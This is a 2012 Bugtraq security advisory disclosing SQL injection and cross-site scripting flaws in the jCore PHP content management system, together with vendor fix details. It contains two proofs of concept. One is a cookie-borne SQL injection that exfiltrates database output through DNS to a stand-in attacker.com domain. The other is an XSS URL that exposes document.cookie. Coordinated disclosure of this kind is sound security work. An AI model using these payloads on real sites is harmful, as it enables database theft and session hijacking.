[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple vulnerabilities in jCore
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple vulnerabilities in jCore
- From: advisory@xxxxxxxxxxxx
- Date: Wed, 17 Oct 2012 13:39:58 +0200 (CEST)
Advisory ID: HTB23107
Product: jCore
Vendor: jcore.net
Vulnerable Version(s): 1.0pre and probably prior
Tested Version: 1.0pre
Vendor Notification: August 1, 2012
Public Disclosure: October 17, 2012
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-4231, CVE-2012-4232
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3
(AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in
jCore, which can be exploited to perform Cross-Site Scripting (XSS) and SQL
Injection attacks.
1) SQL Injection in jCore: CVE-2012-4232
1.1 Input passed via the "memberloginid" COOKIE parameter to /admin/index.php
is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The PoC code below is based on DNS Exfiltration technique and may be used if
the database of the vulnerable application is hosted on a Windows system. The
PoC will send a DNS request demanding IP addess for `version()` (or any other
sensetive output from the database) subdomain of ".attacker.com" (a domain
name, DNS server of which is controlled by the attacker):
GET /admin/?logout=1 HTTP/1.1
Cookie: memberloginid=' OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
--
2) Cross-Site Scripting (XSS) in jCore: CVE-2012-4231
2.1 Input passed via the "path" GET parameter to /admin/index.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's
browser session in context of affected website.
The following PoC demonstrates the vulnerability:
http://[host]/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27
-----------------------------------------------------------------------------------------------
Solution:
As a temporary solution upgrade to version 1.0pre2:
http://jcore.net/news/jcore-ver-10pre2-available-for-testing
Final fix will be available in version 1.0 soon.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23107 -
https://www.htbridge.com/advisory/HTB23107 - Multiple vulnerabilities in jCore.
[2] jCore - http://jcore.net/ - jCore is a free and open source content
management system (CMS) written in PHP and distributed under the GNU General
Public License.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.